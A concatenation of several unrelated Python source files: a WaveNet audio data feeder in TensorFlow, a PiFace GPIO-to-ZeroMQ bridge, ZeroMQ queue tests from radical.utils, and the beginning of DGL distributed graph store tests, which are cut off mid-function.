self._test_meta = list(np.array(self._metadata)[test_indices])
self.test_steps = len(self._test_meta) // hparams.wavenet_batch_size
if hparams.wavenet_test_size is None:
assert hparams.wavenet_test_batches == self.test_steps
#Get conditioning status
self.local_condition, self.global_condition = self._check_conditions()
with tf.device('/cpu:0'):
# Create placeholders for inputs and targets. Don't specify batch size because we want
# to be able to feed different batch sizes at eval time.
if is_scalar_input(hparams.input_type):
input_placeholder = tf.placeholder(tf.float32, shape=(None, 1, None), name='audio_inputs')
target_placeholder = tf.placeholder(tf.float32, shape=(None, None, 1), name='audio_targets')
target_type = tf.float32
else:
input_placeholder = tf.placeholder(tf.float32, shape=(None, hparams.quantize_channels, None), name='audio_inputs')
target_placeholder = tf.placeholder(tf.int32, shape=(None, None, 1), name='audio_targets')
target_type = tf.int32
self._placeholders = [
input_placeholder,
target_placeholder,
tf.placeholder(tf.int32, shape=(None, ), name='input_lengths'),
]
queue_types = [tf.float32, target_type, tf.int32]
if self.local_condition:
self._placeholders.append(tf.placeholder(tf.float32, shape=(None, hparams.num_mels, None), name='local_condition_features'))
queue_types.append(tf.float32)
if self.global_condition:
self._placeholders.append(tf.placeholder(tf.int32, shape=(None, 1), name='global_condition_features'))
queue_types.append(tf.int32)
# Create queue for buffering data
queue = tf.FIFOQueue(8, queue_types, name='intput_queue')
self._enqueue_op = queue.enqueue(self._placeholders)
variables = queue.dequeue()
self.inputs = variables[0]
self.inputs.set_shape(self._placeholders[0].shape)
self.targets = variables[1]
self.targets.set_shape(self._placeholders[1].shape)
self.input_lengths = variables[2]
self.input_lengths.set_shape(self._placeholders[2].shape)
#If local conditioning disabled override c inputs with None
if hparams.cin_channels < 0:
self.local_condition_features = None
else:
self.local_condition_features = variables[3]
self.local_condition_features.set_shape(self._placeholders[3].shape)
#If global conditioning disabled override g inputs with None
if hparams.gin_channels < 0:
self.global_condition_features = None
else:
self.global_condition_features = variables[4]
self.global_condition_features.set_shape(self._placeholders[4].shape)
# Create queue for buffering eval data
eval_queue = tf.FIFOQueue(1, queue_types, name='eval_queue')
self._eval_enqueue_op = eval_queue.enqueue(self._placeholders)
eval_variables = eval_queue.dequeue()
self.eval_inputs = eval_variables[0]
self.eval_inputs.set_shape(self._placeholders[0].shape)
self.eval_targets = eval_variables[1]
self.eval_targets.set_shape(self._placeholders[1].shape)
self.eval_input_lengths = eval_variables[2]
self.eval_input_lengths.set_shape(self._placeholders[2].shape)
#If local conditioning disabled override c inputs with None
if hparams.cin_channels < 0:
self.eval_local_condition_features = None
else:
self.eval_local_condition_features = eval_variables[3]
self.eval_local_condition_features.set_shape(self._placeholders[3].shape)
#If global conditioning disabled override g inputs with None
if hparams.gin_channels < 0:
self.eval_global_condition_features = None
else:
self.eval_global_condition_features = eval_variables[4]
self.eval_global_condition_features.set_shape(self._placeholders[4].shape)
def start_threads(self, session):
self._session = session
thread = threading.Thread(name='background', target=self._enqueue_next_train_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
thread = threading.Thread(name='background', target=self._enqueue_next_test_group)
thread.daemon = True #Thread will close when parent quits
thread.start()
def _get_test_groups(self):
meta = self._test_meta[self._test_offset]
self._test_offset += 1
if self._hparams.train_with_GTA:
mel_file = meta[2]
else:
mel_file = meta[1]
audio_file = meta[0]
input_data = np.load(os.path.join(self._base_dir, audio_file))
if self.local_condition:
local_condition_features = np.load(os.path.join(self._base_dir, mel_file))
else:
local_condition_features = None
if self.global_condition:
global_condition_features = meta[3]
if global_condition_features == '<no_g>':
raise RuntimeError('Please redo the wavenet preprocessing (or GTA synthesis) to assign global condition features!')
else:
global_condition_features = None
return (input_data, local_condition_features, global_condition_features, len(input_data))
def make_test_batches(self):
start = time.time()
#Read one example for evaluation
n = 1
#Test on entire test set (one sample at an evaluation step)
examples = [self._get_test_groups() for i in range(len(self._test_meta))]
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log('\nGenerated {} test batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
return batches
def _enqueue_next_train_group(self):
while not self._coord.should_stop():
start = time.time()
# Read a group of examples
n = self._hparams.wavenet_batch_size
examples = [self._get_next_example() for i in range(n * _batches_per_group)]
# Bucket examples base on similiar output length for efficiency
examples.sort(key=lambda x: x[-1])
batches = [examples[i: i+n] for i in range(0, len(examples), n)]
np.random.shuffle(batches)
log('\nGenerated {} train batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start))
for batch in batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch)))
self._session.run(self._enqueue_op, feed_dict=feed_dict)
def _enqueue_next_test_group(self):
test_batches = self.make_test_batches()
while not self._coord.should_stop():
for batch in test_batches:
feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch)))
self._session.run(self._eval_enqueue_op, feed_dict=feed_dict)
def _get_next_example(self):
'''Get a single example (input, output, len_output) from disk
'''
if self._train_offset >= len(self._train_meta):
self._train_offset = 0
np.random.shuffle(self._train_meta)
meta = self._train_meta[self._train_offset]
self._train_offset += 1
if self._hparams.train_with_GTA:
mel_file = meta[2]
if 'linear' in mel_file:
raise RuntimeError('Linear spectrogram files selected instead of GTA mels, did you specify the wrong metadata?')
else:
mel_file = meta[1]
audio_file = meta[0]
input_data = np.load(os.path.join(self._base_dir, audio_file))
if self.local_condition:
local_condition_features = np.load(os.path.join(self._base_dir, mel_file))
else:
local_condition_features = None
if self.global_condition:
global_condition_features = meta[3]
if global_condition_features == '<no_g>':
raise RuntimeError('Please redo the wavenet preprocessing (or GTA synthesis) to assign global condition features!')
else:
global_condition_features = None
return (input_data, local_condition_features, global_condition_features, len(input_data))
def _prepare_batch(self, batch):
np.random.shuffle(batch)
#Limit time steps to save GPU Memory usage
max_time_steps = self._limit_time()
#Adjust time resolution for upsampling
batch = self._adjust_time_resolution(batch, self.local_condition, max_time_steps)
#time lengths
input_lengths = [len(x[0]) for x in batch]
max_input_length = max(input_lengths)
inputs = self._prepare_inputs([x[0] for x in batch], max_input_length)
targets = self._prepare_targets([x[0] for x in batch], max_input_length)
local_condition_features = self._prepare_local_conditions(self.local_condition, [x[1] for x in batch])
global_condition_features = self._prepare_global_conditions(self.global_condition, [x[2] for x in batch])
new_batch = (inputs, targets, input_lengths)
if local_condition_features is not None:
new_batch += (local_condition_features, )
if global_condition_features is not None:
new_batch += (global_condition_features, )
return new_batch
def _prepare_inputs(self, inputs, maxlen):
if is_mulaw_quantize(self._hparams.input_type):
#[batch_size, time_steps, quantize_channels]
x_batch = np.stack([_pad_inputs(np_utils.to_categorical(
x, num_classes=self._hparams.quantize_channels), maxlen) for x in inputs]).astype(np.float32)
else:
#[batch_size, time_steps, 1]
x_batch = np.stack([_pad_inputs(x.reshape(-1, 1), maxlen) for x in inputs]).astype(np.float32)
assert len(x_batch.shape) == 3
#Convert to channels first [batch_size, quantize_channels (or 1), time_steps]
x_batch = np.transpose(x_batch, (0, 2, 1))
return x_batch
def _prepare_targets(self, targets, maxlen):
#[batch_size, time_steps]
if is_mulaw_quantize(self._hparams.input_type):
y_batch = np.stack([_pad_targets(x, maxlen) for x in targets]).astype(np.int32)
else:
y_batch = np.stack([_pad_targets(x, maxlen) for x in targets]).astype(np.float32)
assert len(y_batch.shape) == 2
#Add extra axis (make 3 dimension)
y_batch = np.expand_dims(y_batch, axis=-1)
return y_batch
def _prepare_local_conditions(self, local_condition, c_features):
if local_condition:
maxlen = max([len(x) for x in c_features])
c_batch = np.stack([_pad_inputs(x, maxlen) for x in c_features]).astype(np.float32)
assert len(c_batch.shape) == 3
#[batch_size, c_channels, time_steps]
c_batch = np.transpose(c_batch, (0, 2, 1))
if self._hparams.normalize_for_wavenet:
#[-max, max] or [0,max]
T2_output_range = (-self._hparams.max_abs_value, self._hparams.max_abs_value) if self._hparams.symmetric_mels else (0, self._hparams.max_abs_value)
#rerange to [0, 1]
c_batch = np.interp(c_batch, T2_output_range, (0, 1))
else:
c_batch = None
return c_batch
def _prepare_global_conditions(self, global_condition, g_features):
if global_condition:
g_batch = np.array(g_features).astype(np.int32).reshape(-1, 1)
else:
g_batch = None
return g_batch
def _check_conditions(self):
local_condition = self._hparams.cin_channels > 0
global_condition = self._hparams.gin_channels > 0
return local_condition, global_condition
def _limit_time(self):
'''Limit time resolution to save GPU memory.
'''
if self._hparams.max_time_sec is not None:
return int(self._hparams.max_time_sec * self._hparams.sample_rate)
elif self._hparams.max_time_steps is not None:
return self._hparams.max_time_steps
else:
return None
def _adjust_time_resolution(self, batch, local_condition, max_time_steps):
'''Adjust time resolution between audio and local condition
'''
if local_condition:
new_batch = []
for b in batch:
x, c, g, l = b
if len(x) < len(c) * audio.get_hop_size(self._hparams):
pad_length = audio.get_hop_size(self._hparams) * len(c) - len(x)
if pad_length % 2 == 0:
x = np.pad(x, (pad_length//2, pad_length//2),mode='constant', constant_values=_pad )
else:
x = np.pad(x, (pad_length//2, (pad_length+1)//2),mode='constant', constant_values=_pad )
else:
c = self._pad_specs(c, len(x) // audio.get_hop_size(self._hparams))
self._assert_ready_for_upsample(x, c)
if max_time_steps is not None:
max_steps = _ensure_divisible(max_time_steps, audio.get_hop_size(self._hparams), True)
if len(x) > max_time_steps:
max_time_frames = max_steps // audio.get_hop_size(self._hparams)
start = np.random.randint(0, len(c) - max_time_frames)
time_start = start * audio.get_hop_size(self._hparams)
x = x[time_start: time_start + max_time_frames * audio.get_hop_size(self._hparams)]
c = c[start: start + max_time_frames, :]
self._assert_ready_for_upsample(x, c)
new_batch.append((x, c, g, l))
return new_batch
else:
new_batch = []
for b in batch:
x, c, g, l = b
x = audio.trim(x)
if max_time_steps is not None and len(x) > max_time_steps:
start = np.random.randint(0, len(c) - max_time_steps)
x = x[start: start + max_time_steps]
new_batch.append((x, c, g, l))
return new_batch
def _assert_ready_for_upsample(self, x, c):
assert len(x) % len(c) == 0 and len(x) // len(c) == audio.get_hop_size(self._hparams)
def _pad_specs(self, x, maxlen):
return np.pad(x, [(0, maxlen - x.shape[0]), (0, 0)], mode='constant', constant_values=self._spec_pad)
def _pad_inputs(x, maxlen):
return np.pad(x, [(0, maxlen - len(x)), (0, 0)], mode='constant', constant_values=_pad)
def _pad_targets(x, maxlen):
return np.pad(x, (0, maxlen - len(x)), mode='constant', constant_values=_pad)
def _round_up(x, multiple):
remainder = x % multiple
return x if remainder == 0 else x + multiple - remainder
def _ensure_divisible(length, divisible_by=256, lower=True):
if length % divisible_by == 0:
return length
if lower:
return length - length % divisible_by
else:
return length + (divisible_by - length % divisible_by)
|
io_pifacedigitalio.py
|
import zmq
import argparse
import threading
import json
import pifacedigitalio as pfdio
from time import sleep
IN_PORTS = (
0b00000001,
0b00000010,
0b00000100,
0b00001000,
0b00010000,
0b00100000,
0b01000000,
0b10000000
)
def parse_args():
"""
Specify and parse command line arguments.
"""
p = argparse.ArgumentParser()
p.add_argument("pub_uri")
p.add_argument("pull_uri")
p.add_argument("--pub_prefix", default="GPIO")
return p.parse_args()
def set_up_pub_socket(uri):
"""
Create ZeroMQ PUB socket and bind it to the specified uri.
"""
context = zmq.Context()
socket = context.socket(zmq.PUB)
socket.bind(uri)
return socket
def zmq_to_gpio_out(uri, gpio, stop_event):
"""
Create a ZeroMQ PULL oscket, bind it to the specified uri, then change any
specified GPIO outputs according to messages received. Close the port and
return when stop_event is set.
"""
context = zmq.Context()
pull = context.socket(zmq.PULL)
pull.bind(uri)
while not stop_event.is_set():
try:
msg = pull.recv(zmq.NOBLOCK)
except zmq.error.Again:
stop_event.wait(0.01)
continue
print "Received message: %s" % msg
_handle_rx_msg(msg, gpio)
pull.close()
def _handle_rx_msg(msg, gpio):
"""
Decipher the received message and perform the desired functions on GPIO.
"""
try:
msg = json.loads(msg)
except ValueError as e:
print "Message was not JSON formatted, discarding: %s" % e
return
for pin, value in msg.items():
try:
gpio.output_pins[int(pin)].value = 1 if value else 0
except KeyError:
print "No output pin with index of %s" % pin
except ValueError:
print "Output pins must be numbers, not %s" % pin
if __name__ == "__main__":
args = parse_args()
gpio = pfdio.PiFaceDigital()
pub = set_up_pub_socket(args.pub_uri)
stop_event = threading.Event()
z2gpio = threading.Thread(
target=zmq_to_gpio_out, args=(args.pull_uri, gpio, stop_event))
z2gpio.start()
current_values = {}
try:
while True:
port = gpio.input_port.value
values = {i: bool(port & IN_PORTS[i]) for i in range(0,8)}
if values != current_values:
pub.send_unicode(
u"%s%s" % (args.pub_prefix, json.dumps(values)))
current_values = values
sleep(0.01)
except KeyboardInterrupt:
pass
finally:
stop_event.set()
print "Waiting for threads to finish ..."
z2gpio.join()
print "Closing ZMQ socket ..."
pub.close()
print "Bye!"
|
test_zmq_queue.py
|
#!/usr/bin/env python
__author__ = 'Radical.Utils Development Team'
__copyright__ = 'Copyright 2019, RADICAL@Rutgers'
__license__ = 'MIT'
import time
import pytest
import threading as mt
import radical.utils as ru
# ------------------------------------------------------------------------------
#
@pytest.mark.skip(reason="test has a timing problem and frequently fails")
def test_zmq_queue():
'''
create a bridge, 2 producers (A, B) and 2 consumers (C, D). Send with the
following rates for 10 seconds:
A: 10/s
B: 20/s
Ensure that
- the ratios of sent / received messages reflects the rates
- the local order of messages is preserved
- messages are received exactly once (no messages get lost / duplicated)
'''
c_a = 100
c_b = 200
cfg = ru.Config(cfg={'uid' : 'test_queue',
'channel' : 'test',
'kind' : 'queue',
'log_level': 'error',
'path' : '/tmp/',
'sid' : 'test_sid',
'bulk_size': 50,
'stall_hwm': 1,
})
b = ru.zmq.Queue(cfg)
b.start()
assert(b.addr_in != b.addr_out)
assert(b.addr_in == b.addr_put)
assert(b.addr_out == b.addr_get)
C = ru.zmq.Getter(channel=cfg['channel'], url=str(b.addr_get))
D = ru.zmq.Getter(channel=cfg['channel'], url=str(b.addr_get))
A = ru.zmq.Putter(channel=cfg['channel'], url=str(b.addr_put))
B = ru.zmq.Putter(channel=cfg['channel'], url=str(b.addr_put))
data = dict()
def work_put(putter, uid, n, delay):
data[uid] = list()
idx = 0
while idx < n:
time.sleep(delay)
putter.put({'src' : uid,
'idx' : idx})
idx += 1
data[uid].append(uid)
# send EOF
putter.put({'src' : uid,
'idx' : None})
def work_get(getter, uid):
data[uid] = list()
done = False
n = 0
while not done:
msgs = getter.get()
for msg in msgs:
msg = ru.as_string(msg)
if msg['idx'] is None:
done = True
else:
data[uid].append(msg['src'])
n += 1
getter.stop()
t_a = mt.Thread(target=work_put, args=[A, 'A', c_a, 0.02])
t_b = mt.Thread(target=work_put, args=[B, 'B', c_b, 0.01])
t_c = mt.Thread(target=work_get, args=[C, 'C'])
t_d = mt.Thread(target=work_get, args=[D, 'D'])
t_a.daemon = True
t_b.daemon = True
t_c.daemon = True
t_d.daemon = True
t_a.start()
t_b.start()
t_c.start()
t_d.start()
time.sleep(3)
b.stop()
# uids = list(data.keys())
# for x in uids:
# for y in uids:
# print('%s: %s: %d' % (x, y, data[x].count(y)))
#
# print(len(data['A']))
# print(len(data['B']))
# print(len(data['C']))
# print(len(data['D']))
assert(data['A'].count('A') == c_a)
assert(data['B'].count('B') == c_b)
assert(len(data['A']) == c_a)
assert(len(data['B']) == c_b)
assert(data['C'].count('A') + data['C'].count('B') +
data['D'].count('A') + data['D'].count('B') == c_a + c_b)
avg = (c_a + c_b) / 2
assert(avg - 30 < data['C'].count('A') + data['C'].count('B') < avg + 30)
assert(avg - 30 < data['D'].count('A') + data['D'].count('B') < avg + 30)
# ------------------------------------------------------------------------------
#
def disabled_test_zmq_queue_cb():
'''
same test, but use subscriber callbacks for message delivery
'''
data = {'put': dict(),
'get': dict()}
c_a = 2
c_b = 4
cfg = ru.Config(cfg={'uid' : 'test_queue',
'channel' : 'test',
'kind' : 'queue',
'log_level': 'error',
'path' : '/tmp/',
'sid' : 'test_sid',
'bulk_size': 0,
'stall_hwm': 1,
})
def get_msg_a(msg):
uid, _ = msg.split('.')
if uid not in data['get']:
data['get'][uid] = list()
data['get'][uid].append(uid)
def get_msg_b(msg):
uid, _ = msg.split('.')
if uid not in data['get']:
data['get'][uid] = list()
data['get'][uid].append(uid)
b = ru.zmq.Queue(cfg)
b.start()
assert(b.addr_in != b.addr_out)
assert(b.addr_in == b.addr_put)
assert(b.addr_out == b.addr_get)
time.sleep(2.0)
g_1 = ru.zmq.Getter(channel=cfg['channel'], url=str(b.addr_get), cb=get_msg_a)
g_2 = ru.zmq.Getter(channel=cfg['channel'], url=str(b.addr_get), cb=get_msg_b)
time.sleep(2.0)
A = ru.zmq.Putter(channel=cfg['channel'], url=str(b.addr_put))
B = ru.zmq.Putter(channel=cfg['channel'], url=str(b.addr_put))
def work_put(putter, uid, n, delay):
data['put'][uid] = list()
idx = 0
while idx < n:
time.sleep(delay)
msg = '%s.%d' % (uid,idx)
putter.put(msg)
idx += 1
data['put'][uid].append(uid)
t_a = mt.Thread(target=work_put, args=[A, 'A', c_a, 0.010])
t_b = mt.Thread(target=work_put, args=[B, 'B', c_b, 0.005])
t_a.daemon = True
t_b.daemon = True
t_a.start()
t_b.start()
time.sleep(2.0)
b.stop()
g_1.stop()
g_2.stop()
# import pprint
# pprint.pprint(data)
#
# uids = list(data.keys())
# for x in uids:
# for y in uids:
# print('%s: %s: %d' % (x, y, data[x].count(y)))
#
# print(len(data['A']))
# print(len(data['B']))
# print(len(data['C']))
# print(len(data['D']))
assert(data['put']['A'].count('A') == c_a)
assert(data['put']['B'].count('B') == c_b)
assert(len(data['put']['A']) == c_a)
assert(len(data['put']['B']) == c_b)
# print(data['get']['A'].count('A'))
# print(data['get']['B'].count('B'))
# print(c_a)
# print(c_b)
assert(data['get']['A'].count('A') + data['get']['B'].count('B') == c_a + c_b)
avg = (c_a + c_b) / 2
assert(avg - 5 < data['get']['A'].count('A') + data['get']['B'].count('B') < avg + 5)
assert(avg - 5 < data['get']['A'].count('A') + data['get']['B'].count('B') < avg + 5)
# ------------------------------------------------------------------------------
#
def test_zmq_queue_cb():
'''
same test, but use subscriber callbacks for message delivery, and only use
one subscriber
'''
data = {'put': dict(),
'get': dict()}
c_a = 2
c_b = 4
cfg = ru.Config(cfg={'uid' : 'test_queue',
'channel' : 'test',
'kind' : 'queue',
'log_level': 'error',
'path' : '/tmp/',
'sid' : 'test_sid',
'bulk_size': 0,
'stall_hwm': 1,
})
def get_msg_a(msgs):
for msg in msgs:
uid, _ = msg.split('.')
if uid not in data['get']:
data['get'][uid] = list()
data['get'][uid].append(uid)
b = ru.zmq.Queue(cfg)
b.start()
assert(b.addr_in != b.addr_out)
assert(b.addr_in == b.addr_put)
assert(b.addr_out == b.addr_get)
ru.zmq.Getter(channel=cfg['channel'], url=str(b.addr_get), cb=get_msg_a)
time.sleep(1.0)
A = ru.zmq.Putter(channel=cfg['channel'], url=str(b.addr_put))
B = ru.zmq.Putter(channel=cfg['channel'], url=str(b.addr_put))
def work_put(putter, uid, n, delay):
data['put'][uid] = list()
idx = 0
while idx < n:
time.sleep(delay)
msg = '%s.%d' % (uid,idx)
putter.put(msg)
idx += 1
data['put'][uid].append(uid)
t_a = mt.Thread(target=work_put, args=[A, 'A', c_a, 0.02])
t_b = mt.Thread(target=work_put, args=[B, 'B', c_b, 0.01])
t_a.daemon = True
t_b.daemon = True
t_a.start()
t_b.start()
time.sleep(1.0)
b.stop()
# import pprint
# pprint.pprint(data)
assert(data['put']['A'].count('A') == c_a)
assert(data['put']['B'].count('B') == c_b)
assert(len(data['put']['A']) == c_a)
assert(len(data['put']['B']) == c_b)
# print(data['get']['A'].count('A'))
# print(data['get']['B'].count('B'))
# print(c_a)
# print(c_b)
assert(data['get']['A'].count('A') + data['get']['B'].count('B') == c_a + c_b)
# ------------------------------------------------------------------------------
# run tests if called directly
if __name__ == '__main__':
test_zmq_queue()
test_zmq_queue_cb()
# ------------------------------------------------------------------------------
|
test_dist_graph_store.py
|
import os
os.environ['OMP_NUM_THREADS'] = '1'
import dgl
import sys
import numpy as np
import time
import socket
from scipy import sparse as spsp
from numpy.testing import assert_array_equal
from multiprocessing import Process, Manager, Condition, Value
import multiprocessing as mp
from dgl.heterograph_index import create_unitgraph_from_coo
from dgl.data.utils import load_graphs, save_graphs
from dgl.distributed import DistGraphServer, DistGraph
from dgl.distributed import partition_graph, load_partition, load_partition_book, node_split, edge_split
from numpy.testing import assert_almost_equal
import backend as F
import math
import unittest
import pickle
if os.name != 'nt':
import fcntl
import struct
def get_local_usable_addr():
"""Get local usable IP and port
Returns
-------
str
IP address, e.g., '192.168.8.12:50051'
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
sock.connect(('10.255.255.255', 1))
ip_addr = sock.getsockname()[0]
except ValueError:
ip_addr = '127.0.0.1'
finally:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return ip_addr + ' ' + str(port)
def create_random_graph(n):
arr = (spsp.random(n, n, density=0.001, format='coo', random_state=100) != 0).astype(np.int64)
return dgl.from_scipy(arr)
def run_server(graph_name, server_id, server_count, num_clients, shared_mem):
g = DistGraphServer(server_id, "kv_ip_config.txt", server_count, num_clients,
'/tmp/dist_graph/{}.json'.format(graph_name),
disable_shared_mem=not shared_mem,
graph_format=['csc', 'coo'])
print('start server', server_id)
g.start()
def emb_init(shape, dtype):
return F.zeros(shape, dtype, F.cpu())
def rand_init(shape, dtype):
return F.tensor(np.random.normal(size=shape), F.float32)
def check_dist_graph_empty(g, num_clients, num_nodes, num_edges):
# Test API
assert g.number_of_nodes() == num_nodes
assert g.number_of_edges() == num_edges
# Test init node data
new_shape = (g.number_of_nodes(), 2)
g.ndata['test1'] = dgl.distributed.DistTensor(new_shape, F.int32)
nids = F.arange(0, int(g.number_of_nodes() / 2))
feats = g.ndata['test1'][nids]
assert np.all(F.asnumpy(feats) == 0)
# create a tensor and destroy a tensor and create it again.
test3 = dgl.distributed.DistTensor(new_shape, F.float32, 'test3', init_func=rand_init)
del test3
test3 = dgl.distributed.DistTensor((g.number_of_nodes(), 3), F.float32, 'test3')
del test3
# Test write data
new_feats = F.ones((len(nids), 2), F.int32, F.cpu())
g.ndata['test1'][nids] = new_feats
feats = g.ndata['test1'][nids]
assert np.all(F.asnumpy(feats) == 1)
# Test metadata operations.
assert g.node_attr_schemes()['test1'].dtype == F.int32
print('end')
def run_client_empty(graph_name, part_id, server_count, num_clients, num_nodes, num_edges):
time.sleep(5)
os.environ['DGL_NUM_SERVER'] = str(server_count)
dgl.distributed.initialize("kv_ip_config.txt")
gpb, graph_name, _, _ = load_partition_book('/tmp/dist_graph/{}.json'.format(graph_name),
part_id, None)
g = DistGraph(graph_name, gpb=gpb)
check_dist_graph_empty(g, num_clients, num_nodes, num_edges)
def check_server_client_empty(shared_mem, num_servers, num_clients):
prepare_dist()
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_1'
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
# let's just test on one partition for now.
# We cannot run multiple servers and clients on the same machine.
serv_ps = []
ctx = mp.get_context('spawn')
for serv_id in range(num_servers):
p = ctx.Process(target=run_server, args=(graph_name, serv_id, num_servers,
num_clients, shared_mem))
serv_ps.append(p)
p.start()
cli_ps = []
for cli_id in range(num_clients):
print('start client', cli_id)
p = ctx.Process(target=run_client_empty, args=(graph_name, 0, num_servers, num_clients,
g.number_of_nodes(), g.number_of_edges()))
p.start()
cli_ps.append(p)
for p in cli_ps:
p.join()
for p in serv_ps:
p.join()
print('clients have terminated')
def run_client(graph_name, part_id, server_count, num_clients, num_nodes, num_edges):
time.sleep(5)
os.environ['DGL_NUM_SERVER'] = str(server_count)
dgl.distributed.initialize("kv_ip_config.txt")
gpb, graph_name, _, _ = load_partition_book('/tmp/dist_graph/{}.json'.format(graph_name),
part_id, None)
g = DistGraph(graph_name, gpb=gpb)
check_dist_graph(g, num_clients, num_nodes, num_edges)
def run_emb_client(graph_name, part_id, server_count, num_clients, num_nodes, num_edges):
time.sleep(5)
os.environ['DGL_NUM_SERVER'] = str(server_count)
dgl.distributed.initialize("kv_ip_config.txt")
gpb, graph_name, _, _ = load_partition_book('/tmp/dist_graph/{}.json'.format(graph_name),
part_id, None)
g = DistGraph(graph_name, gpb=gpb)
check_dist_emb(g, num_clients, num_nodes, num_edges)
def run_client_hierarchy(graph_name, part_id, server_count, node_mask, edge_mask, return_dict):
time.sleep(5)
os.environ['DGL_NUM_SERVER'] = str(server_count)
dgl.distributed.initialize("kv_ip_config.txt")
gpb, graph_name, _, _ = load_partition_book('/tmp/dist_graph/{}.json'.format(graph_name),
part_id, None)
g = DistGraph(graph_name, gpb=gpb)
node_mask = F.tensor(node_mask)
edge_mask = F.tensor(edge_mask)
nodes = node_split(node_mask, g.get_partition_book(), node_trainer_ids=g.ndata['trainer_id'])
edges = edge_split(edge_mask, g.get_partition_book(), edge_trainer_ids=g.edata['trainer_id'])
rank = g.rank()
return_dict[rank] = (nodes, edges)
def check_dist_emb(g, num_clients, num_nodes, num_edges):
from dgl.distributed.optim import SparseAdagrad
from dgl.distributed import DistEmbedding
# Test sparse emb
try:
emb = DistEmbedding(g.number_of_nodes(), 1, 'emb1', emb_init)
nids = F.arange(0, int(g.number_of_nodes()))
lr = 0.001
optimizer = SparseAdagrad([emb], lr=lr)
with F.record_grad():
feats = emb(nids)
assert np.all(F.asnumpy(feats) == np.zeros((len(nids), 1)))
loss = F.sum(feats + 1, 0)
loss.backward()
optimizer.step()
feats = emb(nids)
if num_clients == 1:
assert_almost_equal(F.asnumpy(feats), np.ones((len(nids), 1)) * -lr)
rest = np.setdiff1d(np.arange(g.number_of_nodes()), F.asnumpy(nids))
feats1 = emb(rest)
assert np.all(F.asnumpy(feats1) == np.zeros((len(rest), 1)))
policy = dgl.distributed.PartitionPolicy('node', g.get_partition_book())
grad_sum = dgl.distributed.DistTensor((g.number_of_nodes(), 1), F.float32,
'emb1_sum', policy)
if num_clients == 1:
assert np.all(F.asnumpy(grad_sum[nids]) == np.ones((len(nids), 1)) * num_clients)
assert np.all(F.asnumpy(grad_sum[rest]) == np.zeros((len(rest), 1)))
emb = DistEmbedding(g.number_of_nodes(), 1, 'emb2', emb_init)
with F.no_grad():
feats1 = emb(nids)
assert np.all(F.asnumpy(feats1) == 0)
optimizer = SparseAdagrad([emb], lr=lr)
with F.record_grad():
feats1 = emb(nids)
feats2 = emb(nids)
feats = F.cat([feats1, feats2], 0)
assert np.all(F.asnumpy(feats) == np.zeros((len(nids) * 2, 1)))
loss = F.sum(feats + 1, 0)
loss.backward()
optimizer.step()
with F.no_grad():
feats = emb(nids)
if num_clients == 1:
assert_almost_equal(F.asnumpy(feats), np.ones((len(nids), 1)) * 1 * -lr)
rest = np.setdiff1d(np.arange(g.number_of_nodes()), F.asnumpy(nids))
feats1 = emb(rest)
assert np.all(F.asnumpy(feats1) == np.zeros((len(rest), 1)))
except NotImplementedError as e:
pass
except Exception as e:
print(e)
sys.exit(-1)
def check_dist_graph(g, num_clients, num_nodes, num_edges):
# Test API
assert g.number_of_nodes() == num_nodes
assert g.number_of_edges() == num_edges
# Test reading node data
nids = F.arange(0, int(g.number_of_nodes() / 2))
feats1 = g.ndata['features'][nids]
feats = F.squeeze(feats1, 1)
assert np.all(F.asnumpy(feats == nids))
# Test reading edge data
eids = F.arange(0, int(g.number_of_edges() / 2))
feats1 = g.edata['features'][eids]
feats = F.squeeze(feats1, 1)
assert np.all(F.asnumpy(feats == eids))
# Test init node data
new_shape = (g.number_of_nodes(), 2)
test1 = dgl.distributed.DistTensor(new_shape, F.int32)
g.ndata['test1'] = test1
feats = g.ndata['test1'][nids]
assert np.all(F.asnumpy(feats) == 0)
assert test1.count_nonzero() == 0
# reference to a one that exists
test2 = dgl.distributed.DistTensor(new_shape, F.float32, 'test2', init_func=rand_init)
test3 = dgl.distributed.DistTensor(new_shape, F.float32, 'test2')
assert np.all(F.asnumpy(test2[nids]) == F.asnumpy(test3[nids]))
# create a tensor and destroy a tensor and create it again.
test3 = dgl.distributed.DistTensor(new_shape, F.float32, 'test3', init_func=rand_init)
del test3
test3 = dgl.distributed.DistTensor((g.number_of_nodes(), 3), F.float32, 'test3')
del test3
# add tests for anonymous distributed tensor.
test3 = dgl.distributed.DistTensor(new_shape, F.float32, init_func=rand_init)
data = test3[0:10]
test4 = dgl.distributed.DistTensor(new_shape, F.float32, init_func=rand_init)
del test3
test5 = dgl.distributed.DistTensor(new_shape, F.float32, init_func=rand_init)
assert np.sum(F.asnumpy(test5[0:10] != data)) > 0
# test a persistent tesnor
test4 = dgl.distributed.DistTensor(new_shape, F.float32, 'test4', init_func=rand_init,
persistent=True)
del test4
try:
test4 = dgl.distributed.DistTensor((g.number_of_nodes(), 3), F.float32, 'test4')
raise Exception('')
except:
pass
# Test write data
new_feats = F.ones((len(nids), 2), F.int32, F.cpu())
g.ndata['test1'][nids] = new_feats
feats = g.ndata['test1'][nids]
assert np.all(F.asnumpy(feats) == 1)
# Test metadata operations.
assert len(g.ndata['features']) == g.number_of_nodes()
assert g.ndata['features'].shape == (g.number_of_nodes(), 1)
assert g.ndata['features'].dtype == F.int64
assert g.node_attr_schemes()['features'].dtype == F.int64
assert g.node_attr_schemes()['test1'].dtype == F.int32
assert g.node_attr_schemes()['features'].shape == (1,)
selected_nodes = np.random.randint(0, 100, size=g.number_of_nodes()) > 30
# Test node split
nodes = node_split(selected_nodes, g.get_partition_book())
nodes = F.asnumpy(nodes)
# We only have one partition, so the local nodes are basically all nodes in the graph.
local_nids = np.arange(g.number_of_nodes())
for n in nodes:
assert n in local_nids
print('end')
def check_dist_emb_server_client(shared_mem, num_servers, num_clients):
prepare_dist()
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
